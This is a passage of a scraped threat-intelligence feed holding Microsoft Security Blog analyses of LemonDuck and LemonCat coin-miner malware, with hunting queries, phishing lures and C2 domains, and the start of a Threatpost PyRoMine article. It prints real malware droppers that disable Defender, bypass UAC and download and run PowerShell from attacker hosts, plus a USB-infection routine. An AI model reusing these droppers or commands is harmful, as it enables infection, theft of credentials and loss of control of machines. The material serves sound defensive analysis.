impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: &quot;schtasks.exe&quot; /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr &quot;powershell -w hidden -c PS_CMD&quot;. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today&#x27;s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what&#x27;s wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what &#x27;s wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can&#x27;t read it\n * file is brokened, i can&#x27;t open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:11", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it 